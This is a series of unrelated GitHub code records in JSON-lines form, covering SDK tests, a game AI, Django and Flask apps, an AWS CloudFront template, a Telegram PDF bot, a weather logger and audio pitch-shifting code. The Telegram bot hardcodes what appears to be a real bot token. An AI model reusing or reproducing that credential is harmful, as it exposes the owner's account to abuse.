res1.objects[0].item_variation_data.name)\n self.assertEqual('ITEM_VARIATION', res1.objects[1].type)\n self.assertEqual('Small', res1.objects[1].item_variation_data.name)\n\n req2 = SearchCatalogObjectsRequest()\n items_for_tax_query = CatalogQueryItemsForTax()\n items_for_tax_query.tax_ids = [self.objects_by_client_id[self.CLIENT_ID_SALES_TAX]]\n query2 = CatalogQuery()\n query2.items_for_tax_query = items_for_tax_query\n req2.query = query2\n req2.include_deleted_objects = False\n req2.include_related_objects = False\n\n res2 = self.api.search_catalog_objects(req2)\n self.assertEqual(2, len(res2.objects))\n self.assertEqual('ITEM', res2.objects[0].type)\n self.assertEqual('ITEM', res2.objects[1].type)\n\n got_coffee = False\n got_tea = False\n for obj in res2.objects:\n if obj.item_data.name == 'Coffee':\n got_coffee = True\n elif obj.item_data.name == 'Tea':\n got_tea = True\n self.assertTrue(got_coffee)\n self.assertTrue(got_tea)\n\n def test_update_item_modifier_lists(self):\n ids = self.objects_by_client_id\n coffee_id = ids[self.CLIENT_ID_COFFEE]\n milks_id = ids[self.CLIENT_ID_MILKS]\n syrups_id = ids[self.CLIENT_ID_SYRUPS]\n res1 = self.api.retrieve_catalog_object(coffee_id,\n include_related_objects=False)\n self.assertIsNone(res1.errors)\n self.assertEqual(1, len(res1.object.item_data.modifier_list_info))\n ml_id = res1.object.item_data.modifier_list_info[0].modifier_list_id\n self.assertEquals(milks_id, ml_id)\n\n req = UpdateItemModifierListsRequest()\n req.item_ids = [coffee_id]\n req.modifier_lists_to_disable = [milks_id]\n req.modifier_lists_to_enable = [syrups_id]\n res_update = self.api.update_item_modifier_lists(req)\n self.assertIsNone(res_update.errors)\n\n res2 = self.api.retrieve_catalog_object(coffee_id,\n include_related_objects=False)\n self.assertIsNone(res2.errors)\n self.assertEqual(1, len(res2.object.item_data.modifier_list_info))\n ml_id = res2.object.item_data.modifier_list_info[0].modifier_list_id\n self.assertEquals(syrups_id, ml_id)\n\n def test_update_item_taxes(self):\n ids = self.objects_by_client_id\n coffee_id = ids[self.CLIENT_ID_COFFEE]\n sales_tax_id = ids[self.CLIENT_ID_SALES_TAX]\n res1 = self.api.retrieve_catalog_object(coffee_id,\n include_related_objects=False)\n self.assertIsNone(res1.errors)\n self.assertEqual(1, len(res1.object.item_data.tax_ids))\n\n req = UpdateItemTaxesRequest()\n req.item_ids = [coffee_id]\n req.taxes_to_disable = [sales_tax_id]\n res_update = self.api.update_item_taxes(req)\n self.assertIsNone(res_update.errors)\n\n res2 = self.api.retrieve_catalog_object(coffee_id,\n include_related_objects=False)\n self.assertIsNone(res2.errors)\n self.assertIsNone(res2.object.item_data.tax_ids)\n\n def test_upsert_catalog_object(self):\n obj = CatalogObject()\n obj.type = 'DISCOUNT'\n obj.id = self.CLIENT_ID_DISCOUNT\n discount = CatalogDiscount()\n discount.name = 'Half Off'\n discount.percentage = '50.0'\n obj.discount_data = discount\n req = UpsertCatalogObjectRequest(str(uuid.uuid4()), obj)\n res = self.api.upsert_catalog_object(req)\n\n self.assertEqual('Half Off', res.catalog_object.discount_data.name)\n self.assertIsNotNone(res.catalog_object.id)\n self.assertIsNotNone(res.catalog_object.updated_at)\n self.assertIsNotNone(res.catalog_object.version)\n self.assertIsNotNone(res.catalog_object.is_deleted)\n\nif __name__ == '__main__':\n 
unittest.main()\n","repo_name":"square/connect-python-sdk","sub_path":"test/test_catalog_api.py","file_name":"test_catalog_api.py","file_ext":"py","file_size_in_byte":21517,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"52"} +{"seq_id":"42939239264","text":"# ai.py\n#\n# Author: Fabian Meyer\n# Created On: 21 Feb 2019\n\nimport numpy as np\nfrom . import astar\n\nSEARCH_TARGET = 0\nMOVE = 1\n\nclass AI:\n def __init__(self, player):\n self.player = player\n self.path = []\n self.state = SEARCH_TARGET\n self.weight_self = 3\n self.weight_enemy = 6\n self.weight_crossroad = 3\n self.map_positions = np.empty((0, 0))\n self.bomb_times = np.empty((0, 0))\n\n def __update_map_positions(self, map):\n if map.size != self.map_positions.shape:\n width, height = map.size\n self.map_positions = np.empty((width, height, 2))\n self.map_positions[:, :, 0] = np.arange(width) \\\n .reshape(1, width).repeat(height, 0)\n self.map_positions[:, :, 1] = np.arange(height) \\\n .reshape(height, 1).repeat(width, 1)\n\n def __update_bomb_times(self, bombs, map):\n if map.size != self.bomb_times.shape:\n self.bomb_times = np.empty(map.size, dtype=np.int)\n\n self.bomb_times[:, :] = 1e16\n # define the four diections west, east, south, north\n directions = np.array([(1, 0), (-1, 0), (0, 1), (0, -1)])\n for bomb in bombs:\n pos = bomb.pos\n self.bomb_times[pos[0], pos[1]] = bomb.time\n for dir in directions:\n # try to spread the explosions as far as possible\n for delta in range(1, bomb.range):\n npos = pos + dir * delta\n # check if the position is valid, if not stop explosion\n # spread here\n if not map.is_valid(npos) or map.is_blocked(npos) or \\\n map.has_explosion(npos):\n break\n self.bomb_times[pos[0], pos[1]] = bomb.time\n\n def update(self, world):\n self.player.drop_bomb = False\n self.player.move[:] = 0\n\n if self.state == MOVE:\n if self.path:\n next_pos = self.path.pop(0)\n if world.map.is_blocked(next_pos) or world.map.has_explosion(next_pos):\n self.path = []\n self.state = SEARCH_TARGET\n\n next_pos = np.array(next_pos, dtype=np.int)\n self.player.move = next_pos - self.player.pos\n else:\n self.player.drop_bomb = True\n self.state = SEARCH_TARGET\n\n if self.state == SEARCH_TARGET:\n # init score board, each tile gets a score the maximum is chosen as\n # target\n score = np.zeros(world.map.size)\n # get mask of tiles which are not blocked\n unblock = ~world.map.blocked\n width, height = score.shape\n\n # create array of tile positions, create lazily\n self.__update_map_positions(world.map)\n self.__update_bomb_times(world.bombs, world.map)\n\n # calculate distances of this player to all other tiles (manhatten)\n self_dist = np.abs(self.map_positions - self.player.pos).sum(2)\n # normalize distances into interval [0,1]\n self_dist /= self_dist.max()\n # make shortest distances have greates value\n self_dist -= 1\n self_dist *= -1\n\n # check if there are any other players than this one\n if len(world.players) > 1:\n # calculate distances of all enemies to all other tiles\n enemy_dist = []\n for enemy in world.players:\n # check if this player is not the one controlled by ai\n if enemy.id != self.player.id:\n diff = self.map_positions - enemy.pos\n dist = np.abs(diff).sum(2)\n enemy_dist.append(dist)\n\n # convert distance to numpy array\n enemy_dist = np.array(enemy_dist)\n # find element wise minimum of all player distances\n enemy_dist = np.min(enemy_dist, axis=0)\n # normalize distances into interval [0,1]\n enemy_dist /= enemy_dist.max()\n # make 
shortest distances have greates value\n enemy_dist -= 1\n enemy_dist *= -1\n else:\n # no enemies, distances are zero\n enemy_dist = np.zeros((width, height))\n\n # detect how many neighbouring unblocked tiles each tile has\n crossroads = np.zeros((width, height))\n # add +1 if left neighbour is not blocked\n crossroads[1:, :] += unblock[:-1, :] * 1\n # add +1 if right neighbour is not blocked\n crossroads[:-1, :] += unblock[1:, :] * 1\n # add +1 if upper neighbour is not blocked\n crossroads[:, 1:] += unblock[:, :-1] * 1\n # add +1 if lower neighbour is not blocked\n crossroads[:, :-1] += unblock[:, 1:] * 1\n # normalize into interval [0,1]\n crossroads /= 4\n\n # calculate score as weighted sum\n score += self.weight_self * self_dist\n score += self.weight_enemy * enemy_dist\n score += self.weight_crossroad * crossroads\n # set all blocked tiles to zero\n score[world.map.blocked] = 0\n\n def is_valid(node, path):\n return world.map.is_valid(node) and \\\n not world.map.is_blocked(node) and \\\n not world.map.has_explosion(node) and \\\n self.bomb_times[node[0], node[1]] - len(path) - 1 > 0\n\n found = False\n iterations = 0\n while not found and iterations < 10:\n # retrieve tile with maximum score\n target = np.unravel_index(np.argmax(score), score.shape)\n # set score to 0\n score[target[0], target[1]] = 0\n\n # search path with astar\n self.path = astar.search(self.player.pos, target,\n is_valid=is_valid)\n if self.path:\n self.state = MOVE\n found = True\n iterations += 1\n\n if not found:\n print('No path found!')\n","repo_name":"JeFaProductions/bombgame2","sub_path":"bombgame/ai.py","file_name":"ai.py","file_ext":"py","file_size_in_byte":6251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5814799527","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def diameterOfBinaryTree(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n self.best = 0\n self.map = {}\n self.depth(root)\n return self.best\n \n def depth(self, root):\n if not root:\n return 0\n if root in self.map: ######optimization, using hash table\n return self.map[root]\n \n left = self.depth(root.left)\n right = self.depth(root.right)\n self.best = max(self.best, left + right)\n self.map[root] = 1 + max(left, right)\n return self.map[root]\n","repo_name":"shaniavina/Leetcode_Python","sub_path":"diameter_of_binary_tree.py","file_name":"diameter_of_binary_tree.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70724726244","text":"import json\nimport datetime\nfrom django.shortcuts import render\nfrom upload.models import MusicList\nfrom django.http import Http404, HttpResponse\nfrom soundcore.models import LibraryGenerator\nfrom django.contrib.auth.decorators import login_required\n\n\n# Create your views here.\n\n\ndef soundcore_home(request):\n if request.method == \"GET\":\n musics = MusicList.objects.all()\n return render(request, \"soundcore/index.html\", {\"musics\": musics})\n\n elif request.method == \"POST\":\n raise Http404\n\n\n@login_required()\ndef library_show(request):\n if request.method == \"GET\":\n data = LibraryGenerator.objects.filter(owner=request.user)\n return render(request, \"soundcore/library/index.html\", {\"data\": data})\n elif request.method == \"POST\":\n raise 
Http404\n\n\n@login_required()\ndef library_items_show(request, short_url: str):\n if request.method == \"GET\":\n data = LibraryGenerator.objects.get(short_form=short_url)\n if not (data.owner == request.user):\n raise Http404\n\n return render(request, \"soundcore/library/items/index.html\", {\"data\": data})\n elif request.method == \"POST\":\n raise Http404\n\n\n@login_required()\ndef library_create(request):\n if request.method == \"POST\":\n database = LibraryGenerator(owner=request.user)\n database.last_modified = datetime.datetime.now()\n database.save()\n\n post_data = dict(request.POST.lists())\n\n for _ in post_data:\n post_data_json = json.loads(_)\n post_data_song_array = post_data_json[\"array\"]\n post_data_library_name = post_data_json[\"name\"]\n database.name = post_data_library_name\n\n for __ in post_data_song_array:\n database.musics.add(MusicList.objects.get(id=__))\n database.save()\n return HttpResponse(status=200)\n elif request.method == \"GET\":\n musics = MusicList.objects.all()\n return render(\n request, \"soundcore/library/create/index.html\", {\"musics\": musics}\n )\n","repo_name":"baseplate-admin/Django-Archive","sub_path":"06 - SoundCore/soundcore/soundcore/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36297516286","text":"example_input = '''\\\n1 + (2 * 3) + (4 * (5 + 6))\n'''\n\n\ndef eval(equation, precedence):\n equation = equation.strip().split(\" \")\n # print(equation)\n operators, postfix = [], []\n # convert to postfix then evaluate\n for token in equation:\n if str.isdigit(token):\n postfix.append(token)\n elif token == \"(\":\n operators.append(token)\n elif token == \")\":\n op = operators.pop()\n while op != \"(\":\n postfix.append(op)\n op = operators.pop()\n else:\n while len(operators) > 0 and precedence[operators[-1]] >= precedence[token]:\n postfix.append(operators.pop())\n\n operators.append(token)\n\n while len(operators) > 0:\n postfix.append(operators.pop())\n\n # print(postfix)\n\n # eval postfix\n operands = {\"*\": _multiply,\n \"+\": _add,\n \"-\": _subtract\n }\n operands = []\n for token in postfix:\n if str.isdigit(token):\n operands.append(int(token))\n else:\n lhs = operands.pop()\n rhs = operands.pop()\n operands.append(small_evaluate(rhs, lhs, token))\n\n return int(operands[0])\n\n\ndef small_evaluate(rhs, lhs, op):\n operands = {\"*\": _multiply,\n \"+\": _add,\n \"-\": _subtract\n }\n return str(operands[op](int(rhs), int(lhs)))\n\n\ndef _multiply(rhs, lhs):\n return rhs * lhs\n\n\ndef _add(rhs, lhs):\n return rhs + lhs\n\n\ndef _subtract(rhs, lhs):\n return rhs - lhs\n\n\nif __name__ == '__main__':\n p1_precedence = {\"+\": 2,\n \"*\": 2,\n \"(\": 1\n }\n p2_precedence = {\"+\": 3,\n \"*\": 2,\n \"(\": 1\n }\n\n\n # example_input = example_input.replace(\"(\", \"( \")\n # example_input = example_input.replace(\")\", \" )\")\n # print(eval(example_input, precedence))\n\n input = open(\"day_18_input.txt\").readlines()\n total = 0\n for line in input:\n line = line.replace(\"(\", \"( \")\n line = line.replace(\")\", \" )\")\n total += eval(line, p2_precedence)\n\n print(f\"Result: {total}\")\n","repo_name":"KPHippe/AoC_2020","sub_path":"day_18/operation_order.py","file_name":"operation_order.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19265824332","text":"import os\nimport 
time\nimport utils\nimport pandas as pd\n\nif __name__ == \"__main__\":\n start = time.time()\n\n for distance_type in ['center_distance']:\n for window_size in [10, 30, 50, 70]:\n for num_of_steps, num_of_walks in [(5, 10), (10, 5), (15, 3)]:\n file = '../../datasets/' + distance_type + '/window_size_' + str(window_size) + '/' + str(num_of_steps) \\\n + 'steps_' + str(num_of_walks) + 'walks/random_walks.csv'\n print(file)\n if not os.path.exists(file):\n exit(-1)\n\n df = pd.read_csv(file)\n t_sum = 0\n count = 0\n for index, row in df.iterrows():\n t_sum += len(row)\n count += 1\n print(\"\\t\", count, \" - average len \", t_sum / count)\n # break\n\n utils.show_exec_time(start)\n","repo_name":"PanagiotisStasinos/Yago2geo","sub_path":"preprocess/preprocess_utils/check_walks.py","file_name":"check_walks.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33673988789","text":"from troposphere import (\n Base64, GetAtt, FindInMap, Join, Output, Ref, Parameter, Template\n)\nfrom troposphere.s3 import (\n Bucket, PublicRead, WebsiteConfiguration\n)\nfrom troposphere.cloudfront import (\n Distribution, DistributionConfig, Origin, CustomOrigin, CacheBehavior, DefaultCacheBehavior, Cookies, ForwardedValues, S3Origin, Logging\n)\nfrom stacker.blueprints.base import Blueprint\n\nclass s3_and_cloudfront(Blueprint):\n def create_s3_bucket(self):\n t = self.template\n self.s3Bucket = t.add_resource(Bucket(\n \"testS3Bucket2\",\n AccessControl=PublicRead,\n WebsiteConfiguration=WebsiteConfiguration(\n IndexDocument=\"index.html\",\n ErrorDocument=\"error.html\"\n )\n ))\n t.add_output([\n Output(\n \"WebsiteURL\",\n Value=GetAtt(self.s3Bucket, \"WebsiteURL\"),\n Description=\"URL for website hosted on S3\"\n ),\n Output(\n \"S3BucketSecureURL\",\n Value=Join(\"\", [\"http://\", GetAtt(self.s3Bucket, \"DomainName\")]),\n Description=\"Name of S3 bucket to hold website content\"\n ),\n ])\n\n def create_cloudfront_distr(self):\n t = self.template\n self.cloudfrontDistr = t.add_resource(Distribution(\n \"jtdistr\",\n DistributionConfig = DistributionConfig(\n Origins = [Origin(\n Id=\"Origin 1\", \n DomainName=GetAtt(self.s3Bucket, \"DomainName\"),\n S3OriginConfig=S3Origin())\n ],\n DefaultCacheBehavior=DefaultCacheBehavior(\n TargetOriginId=\"Origin 1\",\n ForwardedValues = ForwardedValues(QueryString=False),\n ViewerProtocolPolicy=\"allow-all\"\n ),\n Enabled = True,\n HttpVersion=\"http2\"\n )))\n t.add_output([\n Output(\n \"DistributionId\",\n Value=Ref(self.cloudfrontDistr)\n ),\n Output(\n \"DistributionName\",\n Value=Join(\"\", [\"http://\", GetAtt(self.cloudfrontDistr, \"DomainName\")]))\n ])\n\n def create_template(self):\n self.create_s3_bucket();\n self.create_cloudfront_distr();\n \n","repo_name":"jandelhi/stacker_blueprints","sub_path":"blueprints/s3_and_cloudfront.py","file_name":"s3_and_cloudfront.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5972153595","text":"from flask import Flask,render_template,request\n\n# Flask is a class; instantiate it here\napp=Flask(__name__)\n\n# Bind the URL path /base/info to the index function below\n# Visiting the site URL + /base/info in a browser makes Flask run the body of index\n\n@app.route(\"/base/info\")\ndef index():\n #return \"Web-Day1\"\n # render_template makes Flask open the template file automatically\n # By default it reads from the templates folder of the current project\n info=[\"王二\",\"sophie\",\"tommy\",\"milliy\"]\n return 
render_template(\"index.html\",title=\"Web Page Design\",datalist=info)\n\n@app.route(\"/register\")\ndef register():\n return render_template(\"register.html\")\n\n@app.route(\"/tests/test\",methods=['GET'])\ndef test():\n return render_template(\"test.html\")\n\n@app.route(\"/exec/reg\")\ndef exec_reg():\n # Receive the data the user sent via GET\n print(request.args)\n # Send data back to the user\n return \"success\"\n\n@app.route(\"/exec/post_reg\",methods=[\"POST\"])\ndef exec_post_reg():\n # Receive the data the user sent via POST\n print(request.form)\n city=request.form.get(\"city\")\n more = request.form.get(\"more\")\n habit=request.form.getlist(\"habit\")\n print(more,city,habit)\n # Send data back to the user\n return \"post_success\"\n\nif __name__ == '__main__':\n app.run(host=\"localhost\",port=\"3389\")","repo_name":"zhangtz92/web-test","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27083405575","text":"import telebot\nimport os\n\n# Replace 'your_token_here' with your actual bot token\nbot_token = '6595930371:AAEpa4_PDY_fE8i9Lr7JM33oF4tCyojYllo'\n\n# Initialize the bot\nbot = telebot.TeleBot(bot_token)\n\n# Create a dictionary to map user queries to PDF file paths\nquery_to_pdf = {\n \"treatment of cold\": \"pdfs/cold_treatment.pdf\",\n \"ayurvedic remedies\": \"pdfs/ayurvedic_remedies.pdf\",\n \"some other query\": \"pdfs/some_other.pdf\",\n \"Panchakarma\": \"pdf/Panchakarma(Short book)@Bamsbooksin.pdf\",\n # Add mappings for all your PDF files (100 PDFs)\n # For example:\n \"keyword1\": \"pdfs/pdf1.pdf\",\n \"keyword2\": \"pdfs/pdf2.pdf\",\n \"panchakarma\": \"pdf/Panchakarma(Short book)@Bamsbooksin.pdf\",\n # Continue adding mappings for all 100 PDF files\n}\n\n# Define a function to handle user queries\n@bot.message_handler(commands=['start'])\ndef handle_start(message):\n bot.send_message(message.chat.id, \"Welcome to the Ayurvedic PDF Bot! Send me a keyword to search for PDFs.\")\n\n@bot.message_handler(func=lambda message: message.text.lower() in ['hi', 'hello'])\ndef handle_greeting(message):\n bot.send_message(message.chat.id, f\"Hello, {message.from_user.first_name}!\")\n\n@bot.message_handler(func=lambda message: message.text.lower() == 'who are you')\ndef handle_whoami(message):\n bot.send_message(message.chat.id, \"I am the Ayurvedic PDF Bot. I'm here to help you find and download PDFs.\")\n\n@bot.message_handler(func=lambda message: message.text.lower() == 'thanks')\ndef handle_thanks(message):\n bot.send_message(message.chat.id, \"You're welcome! If you have any more questions or need PDFs, feel free to ask.\")\n\n@bot.message_handler(func=lambda message: message.text.lower() == 'what is this')\ndef handle_whatisthis(message):\n bot.send_message(message.chat.id, \"This is the Ayurvedic PDF Bot. 
You can use it to search for and download Ayurvedic PDFs by sending keywords.\")\n\n@bot.message_handler(func=lambda message: True)\ndef handle_query(message):\n    search_query = message.text.lower()\n    \n    if search_query in query_to_pdf:\n        pdf_path = query_to_pdf[search_query]\n        with open(pdf_path, 'rb') as pdf_file:\n            bot.send_document(message.chat.id, pdf_file, caption=f\"PDF: {search_query}\")\n    else:\n        # Send a GIF with the message \"No PDFs found\" when no matching PDF is found\n        gif_path = 'no_matching_pdf.gif' # Replace with the actual path to your GIF\n        with open(gif_path, 'rb') as gif_file:\n            bot.send_animation(message.chat.id, gif_file, caption=\"No PDFs found\")\n\n# Start the bot\nif __name__ == \"__main__\":\n    bot.polling(none_stop=True)\n","repo_name":"zeviplex/zeviayurpathsala","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"2892423793","text":"from PyQt5.QtWidgets import QCheckBox, QMessageBox\r\nfrom GUI.graph import GraphWidget\r\nfrom Backend.config import Singleton\r\nfrom Backend.exceptions import UnableToAddMoreCountriesToGraph\r\n\r\n\r\nclass Cbx(QCheckBox):\r\n    def __init__(self, parent, name):\r\n        super().__init__(name)\r\n        self.__parent = parent\r\n\r\n        self.clicked.connect(self.__func_to())\r\n\r\n    def __func_to(self):\r\n        return lambda _: self.__on_click()\r\n\r\n    def __on_click(self):\r\n        data = Singleton.get_instance()\r\n        name = self.text()\r\n        try:\r\n            if name in data.get_countries_list():\r\n                data.remove_country(name)\r\n                self.__update_graph()\r\n            else:\r\n                if len(data.get_countries_list()) > 5:\r\n                    self.setChecked(False)\r\n                    raise UnableToAddMoreCountriesToGraph()\r\n                else:\r\n                    data.add_country(name)\r\n                    self.__update_graph()\r\n\r\n        except UnableToAddMoreCountriesToGraph as err:\r\n            msg = QMessageBox()\r\n            msg.setWindowTitle(\"Caught error\")\r\n            msg.setText(f\"{err}\")\r\n            msg.exec_()\r\n\r\n    def __update_graph(self):\r\n        plot = GraphWidget(self.__parent, \"Ozdrowieni\")\r\n        plot.update_graph()\r\n\r\n    def show(self):\r\n        self.setVisible(True)\r\n\r\n    def hide(self):\r\n        self.setVisible(False)\r\n","repo_name":"kepinskw/Python-19","sub_path":"Python-19/GUI/checkboxes.py","file_name":"checkboxes.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"47419880808","text":"import io\nimport ast\nimport os\nimport requests\nimport csv\nimport json\nimport datetime\nimport logging\nimport argparse\nimport configparser\ndef log_now():\n    parser=argparse.ArgumentParser()\n    parser.add_argument('--do_logging', action='store_true')\n    parser.add_argument(\"-c\", \"--conf_file\",help=\"Specify config file\", metavar=\"FILE\")\n    params=parser.parse_args()\n    # args, remaining_argv = parser.parse_known_args()\n    parameters={}\n    print(params.conf_file)\n    if not params.conf_file:\n        params.conf_file=\"~/.weather_app_config\"\n    params.conf_file=os.path.expanduser(params.conf_file)\n    config = configparser.ConfigParser()\n    config.read([params.conf_file])\n    parameters.update(dict(config.items(\"Defaults\")))\n    parameters.update({\"do_logging\":params.do_logging})\n    weather_obj=log_weather(parameters)\n    #a=log_weather(temp_loc, rain_loc, url,params,arg.do_logging)\n    weather_obj.log_data()\n    \nclass log_weather:\n\n    #parms={'dataType':'CLMTEMP', 'station':'HPV', 'rformat':'csv', 'year':'2020'}\n    def __init__(self,params):\n        
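# The params mapping is expected to carry the keys used below (inferred\n        # from the lookups): temp_loc, rain_loc, url, url_params (a dict literal\n        # in string form, parsed with ast.literal_eval) and do_logging.\n        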
self.loc_temp=params[\"temp_loc\"]\n        self.loc_rain=params[\"rain_loc\"]\n        self.url=params[\"url\"]\n        self.params=ast.literal_eval(params[\"url_params\"])\n        self.dologging=params[\"do_logging\"]\n        curtime=datetime.datetime.now()\n        #date_target={'year': curtime.year, 'month': curtime.month, 'day': curtime.day}\n        self.datelog=curtime.strftime(\"%Y_%m_%d\")\n        self.timelog=curtime.strftime(\"%H:%M:%S\")\n        self.header=\"Time_logged, Temperature at \"+self.loc_temp+\", Rainfall at \"+self.loc_rain+'\\n' \n        logs_folder='~/logs_weather/'\n        logs_folder=os.path.expanduser(logs_folder)\n        if not os.path.isdir(logs_folder):\n            os.mkdir(logs_folder)\n        self.pathtofile=logs_folder+self.datelog\n        self.pathtolog=logs_folder+\"debug_log\"\n        if self.dologging:\n            logging.basicConfig(filename=self.pathtolog, level=logging.DEBUG)\n#, encoding='utf-8'\n        if not os.path.isfile(self.pathtofile):\n            with open(self.pathtofile,'w') as f:\n                f.write(self.header)\n\n    def get_response(self, url, parms):\n        response=requests.get(url, params=parms)\n        if not response.ok:\n            raise ValueError(\"Invalid response obtained\")\n        return response.text\n    def log_data(self):\n        data=self.get_response(self.url, self.params)\n        data_f=json.loads(data)\n        temperature_data=data_f[\"temperature\"][\"data\"]\n        rainfall_data=data_f[\"rainfall\"][\"data\"]\n        #print(temperature_data)\n        #print(rainfall_data)\n        templog=None\n        rainlog=None\n        for d in temperature_data:\n            if d[\"place\"]==self.loc_temp:\n                templog=d[\"value\"]\n        for d in rainfall_data:\n            if d[\"place\"]==self.loc_rain:\n                rainlog=d[\"max\"]\n        if templog is None:\n            if self.dologging:\n                logging.info(self.datelog+\"::\"+self.timelog+\":: Temperature value for \"+self.loc_temp+\" doesn't exist. Please try another location\")\n            templog=-1\n        if rainlog is None:\n            if self.dologging:\n                logging.info(self.datelog+\"::\"+self.timelog+\":: Rainfall value for \"+self.loc_rain+\" doesn't exist. Please try another location\")\n            rainlog=-1\n       # print(rainlog)\n       # print(templog)\n        #print(json.dumps(data_f, indent=4, sort_keys=True))\n#        f=io.StringIO(data)\n#        found=False\n#        prev_row=[]\n#        row=[]\n#        for row in csv.reader(f):\n#            if row[0]==str(self.date_target['year']):\n#                found=True\n#            elif found==True:\n#                temp_found=float(prev_row[3])\n#                date_found={'year': int(prev_row[0]), 'month':int(prev_row[1]), 'day':int(prev_row[2])}\n#                break\n#            prev_row=row\n#        if date_found!=self.date_target:\n#                 print(\"Warning! 
data for target date not found, most recent date is\", date_found)\n#        else:\n#            print(\"Found data for the day we were looking for\")\n        with open(self.pathtofile, 'a') as f:\n            strtowrite=self.timelog+','+str(templog)+','+str(rainlog)+'\\n'\n            print(strtowrite)\n            f.write(strtowrite)\n\n","repo_name":"rahulraj1255/weather-logger","sub_path":"poetry_package/weather_logger/get_weather_info.py","file_name":"get_weather_info.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"39814387231","text":"# Check if a given string is a palindrome.\n\ndef is_palindrome(text: str) -> bool:\n\treturn traverse(text, 0, len(text) - 1)\n\ndef traverse(text: str, i: int, j: int) -> bool:\n\tif i > j:\n\t\treturn True\n\t\n\tif text[i] != text[j]:\n\t\treturn False\n\t\n\treturn traverse(text, i + 1, j - 1)\n\nassert is_palindrome('mama') == False\nassert is_palindrome('akka') == True\n\t\t\n\t","repo_name":"ErickMwazonga/sifu","sub_path":"recursion/learning/is_palindrome.py","file_name":"is_palindrome.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"52"}
{"seq_id":"37923653660","text":"import random\n\nimport numpy as np\nimport parselmouth\nfrom parselmouth.praat import call\n\n\ndef change_pitch(sound, factor):\n    manipulation = call(sound, \"To Manipulation\", 0.01, 75, 600)\n\n    pitch_tier = call(manipulation, \"Extract pitch tier\")\n\n    # Arguments : Time range (s), Time range (s), Frequency shift, Unit\n    call(pitch_tier, \"Shift frequencies\", 0, 1000, factor, \"semitones\")\n\n    call([pitch_tier, manipulation], \"Replace pitch tier\")\n    return call(manipulation, \"Get resynthesis (overlap-add)\")\n\n\ndef change_formant(\n    sound, formant_shift_ratio, pitch_shift_ratio, pitch_range_factor, duration_factor\n):\n    # https://www.fon.hum.uva.nl/praat/manual/Sound__Change_gender___.html\n    # Arguments : Minimum pitch(Hz), Maximum pitch(Hz), Formant shift ratio, New pitch median(Hz), Pitch range factor, Duration factor\n    # formant_shift_ratio should be around 0.8-1.2 (N(1.,0.2))\n    # A ratio of 1.1 will change a male voice to a voice with approximate female formant characteristics.\n    # A ratio of 1/1.1 will change a female voice to a voice with approximate male formant characteristics.\n\n    # Pitch range factor should be in between 0.8-1.2 (N(1.,0.2))\n\n    # duration_factor should be in between 0.9-1.1 N(1.,0.1))\n\n    return call(\n        sound,\n        \"Change gender\",\n        75,\n        600,\n        formant_shift_ratio,\n        pitch_shift_ratio,\n        pitch_range_factor,\n        duration_factor,\n    )\n\n\ndef change_pitch_and_formant_random(audio, sample_rate):\n    sound = parselmouth.Sound(audio, sampling_frequency=sample_rate)\n    original_size = sound.values.shape[1]  # shape of sound.values is [1, audio_length]\n    pitch_shift_ratio = random.uniform(-0.2, 0.2)  # about -20 to +20 cents of random detune\n    pitch_shift_ratio = random.choice([-12, 0, 12]) + pitch_shift_ratio\n\n    sound = change_pitch(sound, pitch_shift_ratio)  # net shift: -12, 0, or +12 semitones plus the detune\n\n    formant_shift_ratio = random.uniform(1, 1.4)\n    formant_shift_ratio = random.choice([formant_shift_ratio, 1 / formant_shift_ratio])\n\n    sound = change_formant(\n        sound, formant_shift_ratio, 0.0, 1, max(0.7, random.normalvariate(1.0, 0.05))\n    )\n\n    output = sound.values[0]  # shape of sound.values is [1, audio_length]\n    if output.shape[0] >= original_size:\n        output = output[:original_size]\n    else:\n        output = np.pad(output, (0, original_size - 
output.shape[0]))\n\n    return output\n\n\ndef change_pitch_and_formant(\n    audio,\n    sample_rate,\n    pitch_shift_ratio,\n    formant_shift_ratio,\n    pitch_range_ratio,\n    time_stretch_ratio,\n):\n    sound = parselmouth.Sound(audio, sampling_frequency=sample_rate)\n    original_size = sound.values.shape[1]  # shape of sound.values is [1, audio_length]\n\n    # sound = change_pitch(sound, random.uniform(-0.15, 0.15)) # -15 to +15 cents\n    sound = change_pitch(sound, pitch_shift_ratio)  # caller-provided shift, in semitones\n    sound = change_formant(\n        sound, formant_shift_ratio, 0.0, pitch_range_ratio, time_stretch_ratio\n    )\n\n    output = sound.values[0]  # shape of sound.values is [1, audio_length]\n    if output.shape[0] >= original_size:\n        output = output[:original_size]\n    else:\n        output = np.pad(output, (0, original_size - output.shape[0]))\n\n    return 